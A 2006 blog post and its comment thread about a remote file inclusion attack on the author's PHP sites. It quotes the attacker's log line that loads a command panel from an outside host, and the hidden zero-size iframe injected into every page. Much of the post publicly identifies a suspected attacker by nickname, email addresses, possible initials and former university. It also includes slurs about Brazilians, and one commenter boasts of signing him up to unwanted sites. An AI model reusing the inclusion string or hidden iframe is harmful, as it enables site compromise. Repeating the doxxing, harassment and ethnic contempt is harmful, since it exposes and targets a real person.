Idiots with nothing to do
We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?
I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must had been some script kiddie trying to break into our pages with this dumb method. In little time I found that, something as suspicious as the following:
201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"
If you open the included url (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as php by the script in neonv2, hence adding all the code that he put on that file available to him. (Obviously we have fixed it immediately and you can't do it anymore). Also, the page for server itself is related to animal huntings, which is completely offtopic. Weird…
That code (take a look, it won't open any pop up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just explode it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of html to every page and script? Not for becaming famous since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added a code like this:
iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …
This code apparently belongs to an affiliates programme (sited in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:
- submitting security announcements (which curiously corresponds to the same description of the vulnerabilities he explodes for earning money)
- signing up in gmail (soauker@gmail.com)
- writing in forums defending the hackers against the system, also providing another e-mail address: jpfg@zipmail.com.br. This address could correspond to his real name initials.
It is easy to confirm that both soauker's are the same even if they don't have the same e-mail addresses because he still uses "Adivinha seuburro" as faked name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. All matches.
There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still are referred to linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy which studied there on 2004 and was deeply interested in hacking and *nix systems.
So brazilians hadn't enough with spamming our nice orkut's scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…
It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.
Final advice: always always always filter input arguments for your script.
And for Soauker: GET A FUCKING LIFE!
shine
20060528
Ya me ha contado trace la historia, sorry por el descuido! como no tenia experiencia alguna en PHP no habia caido en la seguridad del sitio, ya no solo del dominio del neon sino del resto… Sorry! :(((
Julio Gorgé
20060528
Hehe, that was funny :DD
ps
20060528
hehehe brazilians :D
evil
20060528
hola sole
I've added him to a shitload of gay sites
just so you know !
and oh!!!… en verano se come menos :D
don't forget to come to Inercia 2006, bigger, better, more !
sole
20060528
hahaha!
I also sent a pair of e-mails to his ISP and the CERT.br. Although I seriously doubt they will do anything but hey… who knows!
eis
20060902
Eh..
That's a huge security hole in your sites. Instead of bashing, you should be thankful somebody exposed it. With webside coding that bad, you really should find yourself another job, or at least get a clue and start learning before you actually code anything.
I do web programming for living and I'm sad to see this kind of incompetency all over the web.
sole
20060902
Obviously it's you who don't have a clue about anything. That code wasn't made by me. I can assure I check that kind of errors systematically, and that's how I spotted the bug, which was in one sub-site we own.
Next time try to get some info before talking nonsense, incompentent commenter.
soledad penadés » Blog Archive » How to set up the web server for working in a team
20061215
[...] So apache can read stuff which users upload, but it can't modify or write to those folders because apache and the user are in different groups. And the traditional solution is to give permissions to everybody. Which, if you have attacks like this one, may allow the attacker to modify the whole hosted tree, which proves that using chmod 777 systematically is a Very Bad Idea. [...]